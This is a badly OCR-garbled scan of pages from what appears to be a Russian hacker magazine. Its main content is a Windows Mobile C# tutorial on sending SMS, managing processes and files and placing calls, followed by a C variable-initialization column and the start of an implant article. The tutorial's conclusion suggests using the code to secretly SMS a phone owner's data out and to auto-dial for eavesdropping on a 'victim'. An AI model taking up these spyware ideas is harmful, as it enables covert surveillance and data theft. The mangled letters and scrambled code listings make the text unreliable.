своему повествованию, резюмируя наиболее важные моменты, делая 
умные и пространные выводы. Сегодня мне хотелось бы немного отойти от 
традиций. Статья, которую ты только что прочитал, писалась за несколько 
дней до начала Пекинской олимпиады. Хочется верить, что российская 
команда надерет всем пятуюточку и завоюет наибольшее количество 
золотых медалей. Ктому моменту, когда ты будешь читать эти строки, итоги 
олимпиады будутуже подведены. И в этом плане я тебе немного завидую. 
Посейчас, камрад, я скажутебе вот что. Почему все эти люди стали лучши- 
ми в мире спортсменами? В первую очередь, потому что у них есть большая 
цель — олимпийское золото. Не просто цель — обогнать соседа Ваську 
или сбросить пять килограмм лишнего веса. А настоящая большая цель. И 
поверьмне, вэтом половинауспеха! Что самое уд и витальное, та кой подход 
действуете любой сфере приложениятвоихусилий. Еслиутебя есть БОЛЬ- 
ЕІІАЯ ЦЕЛЬ, успех неотвратим. Так выпьем же за наши большие цели 
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и из Арріе привыкли реша'^^за^о;^оват^я^ако е ПО и как ие 
н^ж^. Что ж, это выбор их п ользо ва телей. Мы ж е с 



‘□^1 



и просто сами кодим то, что нам нужно. Старая добрая Винда была и остает- 



ем... 



ся другом юзеров и программистов, выбирающих свой собственый путь. 



в МІММОВІІЕ ВЧЕРА 

Еще буквально несколько лет назад мобильная платформа страдала 
дефицитом программного обеспечения. Трудно поверить, но, чтобы найти 
нужную тулзу, приходилось нехило попотеть. А потом еще раз напрячься в 
попытках отыскать заветный крэк (Странно, а вроде все неплохо находи- 
лось, — Прим. Пг.КІоипіг]. Отсутствие софта обуславливалосьтем, что для 
разработки программ под новую платформу не было удобной ЮЕ.Да,был 
могучий ѴІ5иаІС++, в котором, если мне не изменяет память, были соответс- 
твующие мастера. Но, ксожалению, их возможностей не хватало. Когда в 
2003 годуя попробовал замутить первую программу для КПК,тосразу понял, 
что моих нервов нехватитдля интимныхотношений сужасной ѴізиаІЗіибіо. 
После ПеІрЫ эта среда кажется уж больно непродуманной и непонятной. 
Такое чувство, что пересаживаешься с «мерса» на «Волгу». 

В ѴѴІЫМОВІЬЕ СЕГОДНЯ 

Сегодня ѴѴіпбоѵѵз МоЬіІе сильно преобразилась. Она доросла аждо шестой 
версии и теперь ее можно считать действительно комфортной и удобной ОС. 
Это было достигнуто как за счет улучшения внешнего вида, так и за счетуп- 
рощения процесса разработки софта. Сейчасуже не составляеттруда найти 
продвинутый почтовик или навороченный текстовый редактор. Болеетого, 
многие разработчики уже взяли за правило выпускать мобильные версии 
своих настольных продуктов. Для ѴѴіпбоѵѵз МоЬіІе давно появились клоны 
ѴѴіпВАР,То1;а[Соппппапбег, ѴѴіпЕІР, М5 Ойісе ит.д. Появление большого 



количества программ объясняется в первую очередь развитием плат- 
формы .МЕТ. Создавать софт на базе этой технологии чрезвычайно просто 
— и очень привычно для кодеров, которые выросли натакихязыках как 
□е[рЫ/С++ ВиіИег. Последние версии ѴізиаІЭіибіо словно переродились: 
они стали удобными и поистине функциональными. Приготовься, в рамках 
этой статьи мы совершим небольшойтрип в волшебную и многоцветную 
страну ѴѴМ 6.0. 

В ДОРОЖНЫЙ ЧЕМОДАНЧИК 

Отправляясь в путешествие, нельзя забывать про вещи первой необходи- 
мости. Выброси из своего походного чемоданчика проверенный време- 
нем ВеІрЫ, вэтотраз он не пригодится. Вместо негодостаньѴізиаІЭіибіо 
(версию выбери как можно свежее; лично я отдаю предпочтение самой 
последней — 2008). Помимо студии нам также потребуется ЭВКдля работы 
с функциями, характерными для коммуникаторов — зппз, телефония ит.д. И 
5ВК, и самуѴЭты всегда можешьслитьс ѵѵѵѵѵѵ.ппісгогоІ'Есопп . 

В ВРЕМЯ — ДЕНЬГИ 

Будем считать, чтоты успешно скачал и установил нужный 5ВК, а это значит, 
что можно двигаться дальше. Запускай ѴізиаІЭіибіо и создавай новый про- 
ектдля ѴІ5иа[С#типа5таг1:Веѵісе. Сразу после выбора типа проекта перед 
тобой должно появиться окно, похожее на то, что изображено на рисунке 1 . 

В этом окнетебе надо выбрать платформу (Тагдеі; ріаііогт), для которой мы 
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планируем создавать приложение, а также версию .МЕТ Фреймворка (.МЕТ 
Сотрасі: Егатеѵѵогкѵегзіоп) и шаблон приложения (Тетріаіез). Для наших 
примеров в качестве платформы установи ѴѴіпсІоѵѵз МоЬТе 5.0 ЗппагфЬопе 
50К(еслиты качал 6-ю версию 50К, то выбирай именно ее). С нейтебе будут 
доступны все необходимые пространства имен для работы со специфичес- 
кими функциями коммуникаторов/смартфонов. Версию Фреймворка стоит 
выбирать, исходя изтой, которая установлена натвоем девайсе. Например, 
на моем коммуникаторе ТозЫЬа РоНеде 0900тусуется .МЕТ Егатеѵѵогк2.0, 
поэтому я выбрал именно эту версию. Внимание! Если на твоем устройс- 
тве до сих порустановлена первая версия .МЕТ Егатеѵѵогк, то бегом на 
тісгозоі'Тсопп и скачивай хотя бы вторую. Первая ужбольносильноурезана 
в плане функционала. Все, теперь остается только выбрать шаблон для 
нашего приложения. Для сегодняшних примеров нам вполне подойдет 
Веѵісе Арріісабоп. Клацай «Ок» — и ѴізиаІЗіисІіо сгенерирует новый пустой 
проект(рисунок2). 

ПоумолчаниюѴВсоздаетчистый проект для мобильныхустройств соски- 
ном в виде этого самого девайса. По правде говоря, «дизайнить» форму в 
таком виде неоченьудобно, поэтому потрудись сразу отключить отображе- 
ние скина. Сделать это можно, кликнув правой клавишей мыши по форме и 
выбрав в контекстном меню«5боѵѵ5кіп». После этого нехитрого действия 
тыувидишьболее-менее привычный вид формы (рисунокЗ). 

Пустой проект готов и настало время привести его в рабочий вид. Готовь 
мышку, сейчас мы будем раскидывать элементы управления. Сегодня мы 
разберем не один, а сразу несколько примеров. Для такого «проекта» нужна 
соответствующая форма. Кстати, варианта формы с кучей закладокя для 
себя не нашел. Поэтому советую тебе не заморачиваться и пойти тем же 
путем, что и я — бросить и растянуть по всей форме компонентТаЬСопФоІ, а 
затем создать в нем пятьзакладок: 



• Отправка 5М5; 

• Процессы; 

• Файловый менеджер: 

• Піаіег; 

• Полезности. 

Думаю, назначение закладок пояснять не нужно. Все и та к очевидно по их 
названиям... Что?Тебе интересно, что это за закладка «Полезности»? ОК, 
сейчас объясню. Здесь расположено несколько кнопок, которые выполняют 
некоторые полезные для пользователя или западлостроителя действия: 
поворотэкрана, выключение/перезагрузка системы. Мой вариантоформ- 
ленияты можешь увидеть на рисунках 4-7. 

В НАПИШИТЕ ПИСЬМЕЦО... 

С дизайном формы покончено, пора переходить к код и нгу. Первое, чему 
мы сегодня научимся — отправлятьЗМЗ. Этими короткими сообщениями 
пользуется каждый из нас, а раз та к, неплохо бы научиться отправлять их 
программно. Зачем? Цели могугбыть разными. Например, некоторые на ос- 
нове полученныхзнаний смогут за кодить простенькую программку, которая 
будеттранслитерировать весь кириллический текст, тем самым, позволяя 
сэкономить свои кровные на отправке 5М5. Другие могут через зппз «вы- 
водить» с вражеской территории различную полезную информацию. Итак, 
создай обработчиксобытия для одной единственной кнопки с надписью 
«отправить» и напиши в нем следующий код: 

і:Е (СехСВохІ . ТехС != ""){ 

ЗтзМеззаде туте з заде = пеѵ^ ЗтзМеззаде() ; 

//вот здесь можно добавлять кучу получателей 
тутеззаде . То . Абб (пеѵ7 КесіріепД ( ДехДВохІ . Техб ) ) ; 



тутеззаде . КедиезбВеІіѵегуКерогД = сЬКероП: . Сбескеб; 



Получаем процессы 

ргіѵаге ѵоісі СегРгосЬізгО 

{ 

Сигзог.Сиггепі; = Сигзогз.ѴѴаігСигзог; 

ІѵРгосеззЬізіі.Ігетз.СІеагО ; 

ргосе85_1І8і; = ТазкМапа^ег.Ргосезз.СегРгосеззезО; 

богеасИ (ТазкМапа^ег.Ргосезз ргос іп ргосеззДізг) 

{ 

ЬізгѴіеѵѵІгет Меѵѵігет = пеѵѵЬізгѴіеѵѵІгет 

(ргос.РгосеззМ.ТоЗтп^О); 

ЫеѵѵІгет.ЗиЫгетз.АсісіСргос.РгосеззЫате); 

ЫеѵѵІгет.ЗиЫгетз.АсісіСргос.ТІігеасіСоипг.ТоЗтп^О); 

ІѵРгосеззЬізг.Ігетз.АсісіСЫеѵѵІгет); 

} 

Сигзог.Сиггепі: = Сигзогз.ВебаиІЦ 

} 



тутеззаде . Вобу = 1:ехРВох2 . Техб ; 

Лгу 

{ 

тутеззаде . Зепб ( ) ; 

МеззадеВох . ЗІ10Ѵ7 ( "Сообщение успешно отправлено! " , 
"Информация! " ) ; 

} 

саРск 

{ 

МеззадеВох . Зко\л? ( "При отправке сообщения возникла 
ошибка ! " , " Ошибка ! " ) ; 

} 



Ахтунг! Х-релиз! 

На нашем диске ты сможешь найти полноценный Х-релиз фай- 
лового менеджера, заботливо подготовленный и выложенный 
автором статьи. 
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> СІѴСІ 

На нашем ОѴО 
ты найдешь весь 
необходимый стафф 
для статьи — сорцы, 
бинарники, софт. 




> ѵѵагпіпд 

Рискну напомнить, 
что использовать 
свои знания нужно 
только в мирных 
целях — звонки на 
платные номера, 
отсылка приватной 
информации по5М5 
не приветствуется 
законодательством. 
Вся ответственность 
— на тебе лично! 



Рисунок 6. Путеводитель пофайлам] 



Кода немного, такчто быстренько переписывай и возвращай- 
ся сюда за разъяснениями. В самой первой строчке я про- 
веряю, заполнено ли поле с получателем (если нет, то делать 
ничего не нужно). Учти, что для демонстрационного примера 
такой проверки вполне достаточно, но для создания реального 
приложения ее будет маловато. Если ты решишь в будущем 
закодитьтулзу для отправки сообщений, то я рекомендую тебе 
проверять номер получателя с помощью регулярных выраже- 
ний. Только та к можно быть уверенным, что это действительно 
номер, а не чехарда из букв и цифр. Проверив номер полу- 
чателя, можно переходить непосредственно котправке. Для 
отправки 5М5 в ВВКесть готовый класс — ЗтзМеззаде. Как 
и полагается, перед тем как начать работать с классом, нужно 
создать его экземпляр. Именно это я и делаю во второй строчке 
кода. Инициализировав класс, нужно нетеряться, а сразу 
начатьзаполнятьего свойства. Ксчастью, их немного: 

• ТО — коллекция получателей. В этом свойстветы можешь 
установить как одного, так и нескольких получателей. 

• РедиезШеІіѵегуРерогІ — отчет о доставке. Если в этом 
свойстве 1:гие,то после отправки сообщения будет запрошен 
отчет. 

• Восіу — текст сообщен ИЯ. 

Разобравшись со свойствами, можно переходить к методам, а 
метод всего один — Зепй ( ) . В примере вызов метода 5епб() 
я заключаю в блокоператоров исключительных ситуаций. Это 
делается на случай неожиданныхошибок. Попробуй сейчас 
сохранить внесенные изменения и собрать проект. Не спеши 
паниковать, если Ѵ5 нервно матерится. Просто добавь новое 
пространство имен (МісгозоІЕѴѴіпбоѵѵзМоЬіІе.РоскеЮииоок) 

— и опять попытайся собрать проект. Что, не хочет? Ок, бопЧ 
ѵѵоггу. Зайди в меню Рго)ес1:^Абб Реіегепсе. В появившемся 
окне выбери нужную сборку и нажми «ОК». Теперь проект 
должен успешно собраться. Можешьуже сейчас залить свеже- 
испеченную прогув свой девайс и протестировать. А я начну 
разбирать следующий пример. 

В МОНИТОРИМ ПРОЦЕССЫ 

На мой взгляд, один из главных минусов ѴѴіпМоЬіІе — это 
отс^^ствие встроенных средств для просмотра списка активных 
задач или процессов. В написании такой тулзы нет ничего слож- 
ного, но почему-то многие программисты пытаются неплохо 
заработать на подобных программах. Мне на глаза попадался 
продвин^ый диспетчер задач с кучей разных ненужных 
функций по цене $30. Нехило?/! ично для меня это много, и свои 
честно за работа иные денежки я предпочитаю тратить на что- 



нибудьдругое. Итак, создавай обработчиксобытия 
Сііск ( ) для кнопки «Обновить», расположенной 
на второй закладке. Напиши здесь всего одну 
строчку кода: 

СеСРгосЬізД ( ) ; 



Код самой процедуры ты можешь найти на соот- 
ветствующей врезке. Начинай его переписывать, 
а я потружусь объяснить, что в нем происходит. 
Взглянув на листинг, ты наверняка удивился 
— для получения списка процессов потребова- 
лась всего одна строчка (перебор и добавление 
каждого из них в ЕізіѴіеѵѵ не считаем). Если ты 
хоть раз пробовал кодить «диспетчер процес- 
сов» подѴѴіпЗ? (конечно кодил; ][акеруже не раз 
писал об этом), то наверняка помнишь, что для 
получения списка активных процессов прихо- 
дилось вызывать кучуАРІ-функций и совершать 
много телодвижений, — а тут все как-то просто 
и быстро. Но нетак просто, как кажется на первый взгляд! 
Строка «ргосезз_1ізС = ТазкМападег . Ргосезз . 
ОеСРгосеззез ( ) » говоритотом, что получение процессов 
происходит посредством вызова метода ОеСРгосезз ( ) 
класса Ргосезз. Класс Ргосезз является разработкой 
Сгізбап ЕогзЬегд и, благодаря ему, работа с процессами 
превращается в сплошноеудовольствие. Точнее, в одну 
строку. Все, что нам требуется, — это получить список всех 
процессов посредством вызова всего-навсего одного метода 
— ОеСРгосезз () . После этого остается только запустить 
перебор в цикле и вытащить информацию о каждом из них. 
Всю эту информацию (количество потоков, имя процесса, ріб) 
я и добавляю в ьізСѴіеѵ/. Остальную черную работу делает 
хорошо продуманный класс. Кстати, модуль с классом ты мо- 
жешь взятье нашего диска, а после выхода журнала в свет— и 
на ѵѵѵѵѵѵ.ѵг-опііпе.ги будет доср/пен немного переработанный 
вариант этого класса, с возможностью получать путь кфайлу 
процесса. Будем считать, чтосписокпроцессову насполучен. 
Теперь нужно научиться имуправлять — убивать лишние. Для 
решения этой нетрудной задачки у класса Ргосезз есть 
методкіІІО . Реализация процесса завершения — ниже: 

ТазкМападег . Ргосезз ргос; 
ргос = ргосезз_1ізР [ 

ІѵРгосеззЬізР . ЗеІесРесіІпсіісез [ О ] ] ; 
ргос . КІИ ( ) ; 

Силами этого нехитрого кода я выковыриваю выделенный 
процесс и просто вызываю вышеозвученный метод. Просто до 
безобразия! 

г ФАЙЛОВЫЙ МЕНЕДЖЕР 

Файловый менеджер — тулза, без которой я не могу предста- 
вить ни одного своего рабочего дня. На «большом» компе я 
комфортно юзаю бесплатный ОпгеаЮотппапбег(практически 
клон ТоФЮоттапбег’а). С недавнего времени необходимость 
в функциональном файловом менеджере появилась и при 
работе на коммуникаторе. Опять же, я не стал заморачиваться 
с Резсо Ехріогеги его маленькими друзьями, а решил попро- 
бовать за кодить все самостоятельно. Создай пустую функцию 
РіІеЬізС и наполни ее тело (Хе-хе, — Прим. Пг.КЬипіг) кодом 
из соответствующей врезки. Какобычно, возвращайся за 
разъяснениями. 

В самом начале я меняю вид курсора. Получение списка 
файлов — дело небыстрое, особенно на мобильныхдевай- 
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сах. Поэтому, чтобы лишний раз не смущать пользователя, лучше выбрать 
привычный курсордлятормозныхопераций и спатьспокойно. Послетакой 
хитрой подготовки (нервной системы пользователя) ничто не помешает нам 
перейти непосредственно к получению списка файлов. Сначала получим 
списокдиректорий (пусть они будутсверху, каки принято во всех файловых 
менеджерах), а уже после этого пробежимся по файлам. Для получения 
директорий я использую класс вігесСогу. У этого класса есть метод 
СеСВігесСогіез ( ) , позволяющий получитьсписокпапокпо передан- 
ному в качестве единственного параметра пути. Получив списокпапок, 
их обязательно нужнодобавить в контейнер-коллекцию, чтобы потом их 
можно было удобно отсортировать (ПоІйегзЫзС . ЗогС ( ) ). Отсорти- 
ровав списокдиректорий, можно приступать кдобавлению найденных 
папокв ьізСѴіеѵ/. Последобавления папокя приступаю к получению 
файлов. Алгоритм получения списка файловточнотакойже, поэтомуя 
не стану заострять на нем внимание. Теперьсоздай обработчиксобытия 
Сііск ( ) для кнопки «Перейти». По ее нажатию мы будем запрашивать 
содержимое конкретной папки. Все, что нам требуется написать в этом 
обработчике — вызов функции РіІеЬізС ( ) которуюты можешь найти на 
диске Если сейчас запустить пример, то уже реально начать путешествие по 
файловой системе. Набери в поле для ввода п^и любой адрес (например. 
Му Поситепіз) и нажми на кнопку«Перейти». Если при переписывании 
листинга ты недопустил ошибок, то через мгновение ьізДѴіеѵ^ должен 
заполниться списком файлов (рисунокб). 

Итак, теперь наш менеджерумеет отображать списокфайлов, но кое-чего 
ему явно не хватает: какой может быть файловый менеджербез возмож- 
ности выполнения стандартныхопераций (создание папок, копирование 
и удаление файлов, запуска программы)? Поэтому нам волей-неволей, но 
придется расширятьфункционал. ОК, начнем судаления файлов. Удалить 
файл не проблема (гораздо труднее его восстановить:)). От нас требуется 
лишь вызвать метод ВеІеСе ( ) класса Рііе. В качестве одного единс- 
твенного параметра методпринимаетполный путь к то му файлу, который 
должен быть удален. Списокфайлову нас в ьізСѴіеѵ^. Естьу нас и путь к 
папке, в которой мы работаем (сЬРаЦ]і). Значит, все, что нам нужно — это 
прибавить имя файла к полному пути к папке, в которой мы сейчас находим- 
ся, и выполнить метод ВеІеСе ( ) : 

Рііе . ВеІеСе (ЦЬРаСІі. ТехС + 

ІізРѴіеѵ^І . ІРетз [ ІізРѴіеѵ^І . ЗеІесРесіІпсіісез [ О ] ] . ТехР ) ; 

Копирование файла реализуется аналогичным способом, но с одним отли- 
чием — здесь требуется вызывать не метод ВеІеСе ( ) , а метод Сору ( ) , 
которому нужно передать два параметра: 

• полный путь к файлу источнику: 

• полный путь кфайлу приемнику. 



Определить файл-источник можно та КИМ же способом, каки при удалении, 
поэтому еще раз приводить кодя не буду. Папки создаются посредством вы- 
зова метода СгеаСеВігесСогу ( ) . Метод принимает всего один параметр 
— путьксоздаваемой папке. Как видишь, встроенные классы существенно 
упрощают работу с файла ми и папками, позволяя совершеннозабытьо 
неудобном использовании ѴѴіпбоѵѵзАРІ. Совсем другая история с запуском 
файлов. 

Такуж получилось, но разработчики С# не снабдили насудобным клас- 
сом для запуска внешних программ. Печально, но не смертельно. Уже 
известный нам Сгізбап ЕогзЬегд, помимо класса для работы с процессами, 
любезно предоставил на суд общественности класс ЗІгеІІЕхесиСе, 
позволяющий стартовать программы. Подключи модуль с классом ксвоему 
проекту и, вызвав метод ЗСагС ( ) , передай ему путь кзапускаемому файлу. 
Дальнейшее — работа класса. Я не стану приводить пример кода запуска, 
так как в нем ничего неттрудного. В крайнем случае, на ОѴО тебя ждет 
полный исходниксо всеми рассмотренными классами. 

В ПОЗВОНИ МНЕр ПОЗВОНИ 

Мыуже познакомилисьсотправкой 5М5, получением процессов, выпол- 
нением операций с файлам и... дошел черед идотелефонии! Я специально 
оставил это на закуску, ведь благодаря классам работать с ней просто — и 
писать кучу кода не понадобится. Не буду многословным, просто взгляни на 
этот КОД: 

РкопеЫеѵ^РІіопе = пеѵ^ Ркопе ( ) ; 

Ыеѵ^РІіопе . Таік (СЬТеІІЫитЬег . ТехС , іаізе) ; 

Этихтрехстрочекдостаточно, чтобы совершитьзвонокпо номеру (конечно, 
платному! :)), введенному в поле СЬТеІІЫиіпЬег . Второй параметр (і^аізе) 
метода Таік говоритотом, что номер нужно набирать сразу же, не ожидая 
разрешений. 

В ТНЕЕНВ 

Программировать для ѴѴіпбо\л/5 МоЬіІе, используя технологию .МЕТ, чрезвы- 
чайно быстро и удобно. Сегодняшние примеры — лишнее тому подтверж- 
дение. Обрати внимание, мы рассматривалитолько демонстрационные 
примеры, но на их основе вполне реально написать настоящие хакерские 
тулзы. Например, ты без труда сможешь отправлять с девайса владельца 
всю нужную тебе инфу посредством зтз или устроить самую настоящую 
прослушкусредь бела дня (автоматически набрал нужный номер в нужное 
время и...). И пускай потомжертва вспоминает, какеетелефон смогпозво- 
нить, стоя на блокировке. На этой славной ноте я хочузакончить свою сказку 
и попрощаться стобой. Удачи в нелегких кодерских делах! Какобычно, все 
твои вопросы я жду на мыло: апіопоѵ.іаш. кЬѵйдтаіІ. сот , пг 
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ТРЮКИ Р 

от КРЫСА 



СИШНЫЕТРЮКИ 



Доброкачественная инициализация переменных — явление редкое, можно даже сказать, 
уникальное. Анализ открытых исходных текстов и дизассемблирование закрытых двоичных 
модулей показывает, что большинство программистов не имеют никакого представления о 
внутренней кухне компилятора, совершая грубые ляпы, о которых мы сейчас и поговорим! 



1 



СтеКр статика и динамика 



Нем отличаются локальные автоматические переменные от 
локальных статических/глобальных? Да много чем отличаются... так, 
навскидку, без учебника и не вспомнишь, что статические/глобальные 
переменные инициализируются «самостоятельно». Незнание или 
игнорирование этой особенности приводиткдвум распространенным 
ошибкам. 

Код вида іпС X = О ; боо ( ) {... геСигп х; } выглядитужасно не- 
профессионально (х гарантировано обнуляется компилятором путем 
помещения его в секцию данных, тогда какявное присвоение нуля 
— выполняется уже в реальном времени, напрягая процессор лишними 
машинными командами). Неприятно, конечно (свидетельство того, что 
программ ист умных книжек не читал), но не смертельно. 

А вотдругая ошибка, совершаемая уже теми, кто учебники все-таки 



читает, но не дочитывает — «^оо О { зСаСіс іпС х;... геСигпх;}». 
Казалось бы, что здесь неправильного? Ведь переменная х гарантиро- 
вано равняется нулю и инициализировать ее «вручную» необязательно! 
Да, верно, X будет равна нулю, но...— лишь при первом выполнении 
функции. При всех последующих в ней останется знание, которое было 
на момент выхода из функции Поо ( ) , что рискует развалить всю про- 
грамму, а потому инициализировать статические переменные все-таки 
нужно. Если, конечно, они не задействованы для умышленного сохране- 
ния значений и использования их в последующих вызовах функции. 
Явное присвоение значений — расточительная операция в плане про- 
цессорныхтактов и объема кода, особенно когда переменных много. На- 
много выгоднее передать функции шетзеС указатель на начало блока 
статических (глобальных) переменных и проинициализировать их одним 
махом. Экономия становится заметной даже при десятке переменных. 
Следуя духу и этикету языка, следовало бы загнать все переменные 
в единую структуру, чтобы обеспечить гарантированный порядок их 
размещения в памяти... однако, работать со структурами жутко неудобно, 
да и не нужно. Статические и глобальные переменные размещаются в 
памяти в порядке их объявления в программе, и нам достаточно лишь 
получитьуказатель на первую и последнюю переменные. С локальными 
автоматическими переменными этоттрюк, увы, не работает. В общем 
случае они размещаются в порядке, обратном обращению к ним (как 
только компилятор встречаетобращение клокальной переменной, он 



забрасываетее на верхушку стека и потому последняя используемая 
переменная оказывается первой в стековом кадре). Но из этого правила 
существует множество исключений. 

Оптимизирующие компиляторы стремятся выкинуть максимум локаль- 
ных переменных, загнав их в регистры или вычисляя эффективные 
значения еще на стадии компиляции. А последние версии ССС и М5ѴС, 
вдобавок, бьют стековый фрейм на две части, складируя в одну буфера, а 
в другую — скалярные переменные и указатели для затруднения атак на 
переполнение. Какследствие, мы уже не можем инициализировать ло- 
кальные переменные через плетзеЕ То есть, еще как можем! Достаточно 
поместить их в структуру! Неудобно, но на какие жертвы не пойдешь ради 
оптимизации! Только в этом случае она будет называться «пессимиза- 
цией», поскольку компилятор не может оптимизировать члены структуры 
также свободно, какобычные локальные переменные. Некоторые 
компиляторы поддерживают нестандартный ключ, предписывающий 
выполнять инициализацию стекового кадра при его открытии. На пер- 
вый взгляд, очень полезная штука. Но пользоваться ей категорически 
не рекомендуется (поэтому автор даже не будет говорить, что это за ключ 
такой и кто его поддерживает), поскольку в этом случае весь стековый 
фрейм инициализируется целиком, даже если содержит массивы, явно 
инициализируемые по ходу программы ненулевыми значениями. И 
этоеще мелочи — подумаешь, двойное обращение кпамяти! Гораздо 
хуже, когда программист, закладывающийся нато, что инициализацию 
локальных переменных выполнит компилятор, публикует кодсвоей 
программы или используетего фрагменты в другом проекте, забыв отом, 
что там локальные переменные уже не инициализируются! 

Вывод: без особой нужды массивы лучше в стеке не размещать. Ис- 
пользуйте для этого статическую память или кучу. Первая инициализи- 
руется при загрузке исполняемого файла в память. Вторую программист 
инициализируетявно, когда это действительно необходимо. На самом 
деле, менеджер кучи, встроенный в операционную систему, всегда 
выполняет инициализацию блоков памяти перед их отдачей прикладной 
программе. Однако, при переходе на прикладнойуровень — уровень 
библиотек и ВТЕ — мы, в общем случае, не можем сказать, выполняется 
автоматическая инициализация или нет, а потому лучше не рисковать, 
особенно, если программу планируется переносить на другие платфор- 
мы или компилировать более чем одним компилятором. 



► ііб 
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За вот другая популярная ошибка, встречающая практически пов- 
семестно и ставшая неофициальным стандартом де-факто: 

Классическая ошибка использования локальных буферов 

^оо ( ) 

{ 

сітаг 3 [ ] = "Ііеііо , заі1ог!\п"; 

Ьаг ( 3 ) ; 

} 

Что нетак— вполне приличный код! Аесли подумать? Компилятор 
размещает строку «Ііеііо , заііог ! \п» в секции данных (хотя тут 
возможны вариации), что происходитна стадии компиляции. Азатем ко- 
пирует ее влокальный буфер при каждом вызове функции уже на стадии 
исполнения! Таким образом мы получаем двойной перерасход памяти 
и довольно ощутимыетормоза, которые ничем не оправданы, поскольку 
функция Ьаг не изменяет строку в. Поэтому перед «сЬаг з [ ] » необходи- 
мо поставить «зСаСі с» или вынести в в глобальные переменные. 
Впрочем, настоящие проблемы начинаются, когда программист (при- 
чем, вменяемый, трезвый и совсем не обкуренный) пишет код вида: 



зСаСіс іпС _таСгіх [100] [100]={{1,2,3}, 

{4,5,6}, {7,8,9}}; 
іпС (*таСгіх) [100] [100]; 

таСгіх= ( іпС ( * ) [ 100 ] [ 100 ] ) таііос ( зігеоТ (таСгіх) ) ; 
ІТ ( ІтаСгіх) геСигп-І; 

еізе тетсру (таСгіх , _таРгіх, зігеоТ (таРгіх) ) ; 



Тгее (таРгіх) ; 

} 

Конечно, куча не лишена недостатков. Выделение динамической памяти 
занимает больше времени, чем стековой. Динамические блоки необхо- 
димо освобождать и еще обрабатывать ситуацию с нехваткой памяти, 
проверяяуспешность завершения таііос. При этом: а) динамичес- 
кой памяти, как правило, имеется в избытке и отсутствие проверки, в 
общем-то, не фатально; б) никто не гарантирует успешность выделения 
стековой памяти, а универсального способа проверки (работающего во 
всех системах) нет и остается только молиться, надеясь на то, что стека 
все-таки хватит. 

Короче, существуеттысяча и одна причина для отказа от использования 
стековой памяти при работе со строками и массивами. 




Ужас, летящий на крыльях ночи 

Поо ( ) 

{ 

іпЦ таСгіх[100] [100]={{1,2,3},{4,5,б},{7,8,9}}; 

} 

Аздесь что не в порядке? Программист создаетзаконный двухмерный 
массив, инициализируя малую его часть (очевидно, что остальные 
ячейки предполагается заполнить по ходу выполнения функции Іоо). Со- 
гласно Стандарту, здесь инициализируется весь массив, причем, нену- 
левые ячейки компиляторы инициализируют индивидуально, расходуя 
на каждую из них, по меньшей мере, одну машинную инструкцию. Это в 
идеале, а на практике компилятору М5 ѴС необходимо 27 команд, чтобы 
справиться с вышеприведенным массивом. Хорошего мало, особенно, 
если функция [оо вызывается больше одного раза. Стек не резиновый и 
обычно (читай — поумолчанию) потоку достается порядка 1 Мб. 

За бездумное размещение массивов в стеке давноуже пора расстре- 
ливать. Ключевое слово «зСаСіс», размещенное перед «іпі; таігіх», 
сокращает потребности в памяти и увеличиваетскорость выполнения 
программы в несколько раз! А как быть, если статический массив нас «ну 
никак неустраивает»? Допустим, массивдолжен инициализировать- 
ся при каждом вхождении в функцию. Нет ничего проще! Размещаем 
исходный массив в глобальной или статической переменной, а при 
каждом вхождении в функцию копируем его во временный буфер, выде- 
ляемый из пула динамической памяти. Копирование, осуществляемое 
посредством тетсру, намного быстрее поэлементной инициализации 
(напоминаю, что статические массивы инициализируются на стадии 
компиляции, нетранжиря процессорное время). 

Оптимизированный вариант работы с массивом 

ІОО ( ) 

{ 



I 



I Массивы, начинающиеся не с нуля 



В прошлых выпусках «Трюков» мы уже рассматривали спосо- 
бы организации массивов, начинающихся, например, с единицы, что 
особенно удобно при переносе программ с Паскаля и Фортрана на Си. 
Увы, те способы не работали с Си++ и не позволяли создать массивы, 
начинающиеся с произвольного индекса, например, 0x69. 
Предложенный ниже прием полностью совместим с Си++, однако рабо- 
тает не на всех платформах. Руководящая идея проста, какдва весла: 
получаем указатель на массив и уменьшаем его на величину начального 
индекса. Так, мы можем создать массив 6. ..9: 



Создание массива р_аггау[6..9] 

^оо ( ) 

{ 

зСаСіс іпС х_аггау[9 - б] ; 
іпЦ *р_аггау = х_аггау - б; 

геСигп 0 ; 

} 

Аналогичный трюк работает и со стековыми массивами (хотя, как мы 
уже говорили выше, в стеке массивы лучше не размещать), и с динами- 
ческими. Нужнотолько не забыватьувеличиватьуказатель на массив 
при освобождении памяти. Это не украшает программу и чревато 
появлением ошибок— ноза любыеудобства в этом мире приходится 
чем-то платить. 

Другое существенное ограничение заключается в том, что при вы- 
читании начального индекса изуказателя мы рискуем нарваться на 
«заворот». Впрочем, во всех современных операционных системах 
и стек, и куча, и секция данных лежат довольно далеко от нулевого 
адреса. А вот создавать массив типа 666666... 666669 — уже опасно. 

На одной системе (или даже версии системы) это может сработать, на 
другой — уже нет. ІКІ 
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»|СУПЕРСИЛАДЛЯ ХАКЕР;^ 



Подавляющее число людей не отличаются не то чтобы атлетическим 
телосложением, но и вообще не обладают сколько-нибудь заметкой 
физической силой. По крайней мере, не такой, чтобы противостоять, 
скажем, трем противникам одновременно. Атакхочется посрамить 
постановочные трюки Джеки Чана! 



в в ЧЕМ СИЛА, БРАТ? 

На первый взгляд, мышцы — лажа и фигня (по сравнению с почками, 
печенью и, тем более, головным мозгом, где и самый маститыйученый 
не понимает и половины процессов). В «мясе» просто какие-то волокна, 
которые сокращаются... и все, пожалуй. Но простота мышцобманчива! Ко- 
нечно, все они изучены и подсчитаны. Да вот беда — до сих пор не выяснен 
главный момент, интересующий бодибилдеров: почемуже мышцы сокра- 
щаются и за счет чего растут. А если бы исследователи это выяснили, тогда 
мы бы могли штамповать Шварценеггеров поточно-вахтовым методом! 
Вспомним моральноустаревшие боевики сЛундгреном или Ван 
Даммом. Несмотря на розовую мечту сыграть Гамлета, эти мордовороты 
обязательно попадали в оборот жадного продюсера. Тот всенепременно 
покупал идиотский сценарий про суперсолдата, напичканного всякими 
усилителями и имплантами, которые позволяли валить всех одних 
пальцем... 



Современнаятехнологиядавноуже догнала большинство задумок и 
фантастов, и сценаристов. Кардиостимуляторы существуют более трид- 
цати лет, спасая жизни тысячам людей. Лечение поставлено на поток и 
стало рутиной. Технология вылизана до блеска, так что пора задуматься о 
расширении сферы применения имплантированных стимуляторов. 

В МЯСО с КРОВЬЮр ^<ПО-ПРОФЕССОРСКИ^> 

Для начала штудируем теорию. Не все мышцы устроены одинаково. 
Вообще говоря, из почти семисот мускулов человеческого тела (многие 
